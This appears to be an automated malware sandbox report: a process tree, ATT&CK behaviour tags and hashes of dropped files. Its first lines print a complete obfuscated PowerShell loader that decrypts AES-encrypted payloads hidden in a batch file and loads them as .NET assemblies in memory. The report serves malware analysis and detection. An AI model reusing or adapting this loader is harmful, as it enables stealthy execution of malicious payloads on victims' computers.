C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OizxnO3/pdWJ2fJPn6JfWHEAeJ8e9YmWGBkF1RD8gB4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1hDsCU064fe3nz1n2J+tA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BuVAi=New-Object System.IO.MemoryStream(,$param_var); $nTyYw=New-Object System.IO.MemoryStream; $UaJSA=New-Object System.IO.Compression.GZipStream($BuVAi, [IO.Compression.CompressionMode]::Decompress); $UaJSA.CopyTo($nTyYw); $UaJSA.Dispose(); $BuVAi.Dispose(); $nTyYw.Dispose(); $nTyYw.ToArray();}function execute_function($param_var,$param2_var){ $UcolZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iAUtD=$UcolZ.EntryPoint; $iAUtD.Invoke($null, $param2_var);}$QWHqr = 'C:\Users\Admin\AppData\Roaming\Windows_Log_172.bat';$host.UI.RawUI.WindowTitle = $QWHqr;$RtxIM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QWHqr).Split([Environment]::NewLine);foreach ($igBOM in $RtxIM) { if ($igBOM.StartsWith('RgLhaxlcPBQqpmRoVUam')) { $EeOca=$igBOM.Substring(20); break; }}$payloads_var=[string[]]$EeOca.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); 
"8⤵PID:3240
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3148
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5012
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1028
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2832 -ip 28321⤵PID:1780
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 2KB
MD5: 8ba8fc1034d449222856ea8fa2531e28
SHA1: 7570fe1788e57484c5138b6cead052fbc3366f3e
SHA256: 2e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2
SHA512: 7ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b
-
Filesize: 152B
MD5: 0c705388d79c00418e5c1751159353e3
SHA1: aaeafebce5483626ef82813d286511c1f353f861
SHA256: 697bd270be634688c48210bee7c5111d7897fd71a6af0bbb2141cefd2f8e4a4d
SHA512: c1614e79650ab9822c4e175ba528ea4efadc7a6313204e4e69b4a9bd06327fb92f56fba95f2595885b1604ca8d8f6b282ab542988995c674d89901da2bc4186f
-
Filesize: 152B
MD5: 0d84d1490aa9f725b68407eab8f0030e
SHA1: 83964574467b7422e160af34ef024d1821d6d1c3
SHA256: 40c09bb0248add089873d1117aadefb46c1b4e23241ba4621f707312de9c829e
SHA512: f84552335ff96b5b4841ec26e222c24af79b6d0271d27ad05a9dfcee254a7b9e9019e7fac0def1245a74754fae81f7126499bf1001615073284052aaa949fa00
-
Filesize: 5KB
MD5: 83e506b90ab01134a49d1c39f81435a4
SHA1: 313ab67404fef224ba69c3690819f6ec838cfdb7
SHA256: e934697cff1c479a14fefb6b7d30c45767c57b76f59e8c82fd20dfb176062a75
SHA512: bd7b09b8d7463ab1b44d6e7315ada34a5794a54709ad8912f1e840b2023f54e95a13c21bec73662d5eaf9273a5c8ab9abe98a5e8a291e37b420eef6d3deb2e0d
-
Filesize: 6KB
MD5: 3abf936b2a2f2edd91e713b4a5d33b97
SHA1: bfadcecc9566777179ea62a934b216abd4e66b30
SHA256: ee183117529cc34604c75321e615018e52515f8ec77a8e67aa7d5a79e82d70de
SHA512: 72d8437e336c7d2cb116deb59bebef5d12a92f40dd4bf40b21b8cb62902e372d92e24d3fdee065a6a56566c77ccc9e467374691474ba2f7a6a7cea2774e022ce
-
Filesize: 16B
MD5: 46295cac801e5d4857d09837238a6394
SHA1: 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256: 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512: 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize: 16B
MD5: 206702161f94c5cd39fadd03f4014d98
SHA1: bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256: 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512: 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize: 8KB
MD5: f83f1a3f4a7906ed93685e99de3e48e5
SHA1: 35ed7e2a0070b7e6d0e3bef6b9f438e3766af9ff
SHA256: 8e0016cbbe024c2a41e839ccf172cf494ba734f49c726557a219f7d7a269c412
SHA512: 74459300b7754b229bff4112216ee76a00853cbc4720ec3eb2806f6ccac58820edfda56949536296707ad0eb7a52cb22cf3b5d8fd07eefedd3a4787830e6a354
-
Filesize: 8KB
MD5: a8d9fa260268d0aeef5c604ce35c9c5a
SHA1: 2c6e5216c65c9364a36e21b5b7fc8db5ff18fa5c
SHA256: 138d72817b6d39a6252ff82a6372f38c601cd48fa2b1cbafdfb41fbecc450275
SHA512: 185ce2947efa77a78ce0ed9523ec7cc6e86f121c96e5e857a4d7cc9c1caa5f99ceb6a7ba338e76c1e749077aadc0cd93d760b6365693abcffa09fe2f5853417e
-
Filesize: 18KB
MD5: 1314d6b12ac057e167c1734363b8d32d
SHA1: f54e69b17fb65b8da661c6404eb48ec217639270
SHA256: 6fdc5fca629f98db66a207b28ccd11df1d8698539e273082550b7f9eab5e3347
SHA512: 0b87e2ad7adc9bc31cf58b4f705f329250185799d99a2ba0d5a83f623dd5f00eb51e38518a9d6ae16868aadc334c69c7d34eacc4a488dfc6303372f5331458ca
-
Filesize: 18KB
MD5: 2a1fdb89cf408566ad184e42e71bb123
SHA1: 2f834624e56b5082a6a25a88e3d915cbfbc3755c
SHA256: a7f4944b7fa7efb91706f53d6694c619e5f165402b59630c4471513c8e1d515d
SHA512: 0cfd3a5f047f855186fb03cab9f1ae7595225a1568061a03f14880e5093b82dda05729af4289b6572c833a192bf512fcf6d3901f066666ea3fda248d379ca0de
-
Filesize: 21KB
MD5: a5c46224f3aa8c927796932b28d119b4
SHA1: 07988cd548792010638e409431cfd55fbd16ce72
SHA256: 2e9554fcb56fa5bbf482a3974ff32a7c7d55ea0bb619bcb1a132d5cacc5f88e8
SHA512: 8a51e69ebfba35973671060be512dc0f4018d871626168379d191366a4ccc878514209914fa343d0fe92052a78b53ee9333d948c647eaee3ef4e2e5d75c62b63
-
Filesize: 62B
MD5: 48a4d8d2f59528ab75380faa39981ca7
SHA1: aaba2693e7c957bcdf02b95c96348f57dfde0da6
SHA256: 7dc95e5d061697cc48611533328a01f7a69981ff6bd4c86581c98df867a558a2
SHA512: ae8e0f246aab54ebad63bde7dd3594673f92ecd560d047e68a01a731fcb4efbc5625ea36b6b4f0ed90647cae9ed4c8744df0fdf6c4a2c28a467382f29a71616e
-
Filesize: 422B
MD5: 28194258aa09be52f6767e389194ef1d
SHA1: d7ede25b3ebd83a084cff22ae1ad4f7612a99eb0
SHA256: f02fe5951dc207722da607c087c4222067df5ca126687541f3736130e166efbc
SHA512: eec2fc47c9fa340c17a3ff5fb5ffe0abe3ffe1966da131435ca9bcd9b100f2cacf60039969ee4f8e8ea0340d74b8772f9205e57b9a2c83bfdd2ea49c7e5b741c
-
Filesize: 12.8MB
MD5: 189e42d1a681c3b07c7f92d247c214b0
SHA1: 8b96bb15ccb0d433b07b5eadeb5e2a05157d5d99
SHA256: ba7e850b945f72b85cd39d8fc5f6571962ccdfbba5fbda12fc2794b241dce9fd
SHA512: d2acb262d4c1b5fcd63950b3c6928701d6a3314d63e63a243e2df8908b746d7649bf8d3b2b6dd0dc6f39c483bead6516260a7d1e201685eef112134833a95e24
-
Filesize: 74B
MD5: b3be17a14609d812602af67da8b7acc2
SHA1: e1fcc3e3989ee6846694eba252622a336ce63795
SHA256: f6cb1a4b508b1650cc1eaa607f545e50967157eef4f676de39836f2806d63b81
SHA512: 780a624a79bb3b293d83017595f709dd9fdc9e645f9c8bc5102aacaaad89a622e6a0dae9ea30fc3679378f6fe4afe34937f4909594c32351ee831917e8b0c1a7
-
Filesize: 340B
MD5: 6943c2eb7e78b8b8cb8171b940de20f2
SHA1: e428c6dc0ffc17ab70178765e0bcb23dc0c12b8a
SHA256: eb79d4bf846dfbd540085f0972658373f26709f281dfb88ad461f9df03d83095
SHA512: 1d628f3c5ac6e41ed14cc0069bde0278248e32c77e2e111bc842a71ba62d52913b47fb29402ce79b3d0880b6b5763b0d9906d6fb65bcfdf33103aefa0044552b
-
Filesize: 155KB
MD5: 45f7e10fb33d48463a55c89d40d4824a
SHA1: b95ef1efdb8f79c468cd4cdcd85c8dd54087d9e2
SHA256: 7f37dbc61973ca542c89303b1df4f33ccc5ac442a16f497b115236bb58664d2f
SHA512: 43ad9acb9e43063a2d83045a24ff24ea7e211c05cdfc2b202f5cf1bd4e73ee9a134802c9aec22e7b941d4eec905055426b313ea30c7a55a6bb2ca467e77325ad
-
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize: 115B
MD5: b2f9e9363d5230b504c727b66c8f899a
SHA1: ca002f96780145e6bdf6efea6d08a4f3997f4769
SHA256: 658a5212102e7582c463120ff34a0873c21dbae015a2e048e36ecdbf9fb4137b
SHA512: 04a8c7cc5d73ca21e96de1f88a02a6a4a5a71d74b0b5a47ad376bf0b3dea27ced75036819d0fea8994331fe95150eaff9c6c1fbb8199e8d336b6b378983d4c28
-
Filesize: 115B
MD5: d58fbbe00f10ac2f1c10caeadc86cd35
SHA1: a4c82ac805ab54686f8f14a1f7b28eb6c2675b9f
SHA256: 31ba666c8effdfb73401edb4edec3ffad73f847dfab9b2ea32b1476127ffb6f9
SHA512: 06ba02dd9bc8bd8cbd09ae073257fd081f6e5b3e30524b73c868a10e78ac50dec70d0ee75c5d0fae7843ec12ebe6aad14a5fb001e0c1c6463da26ec53d325ce9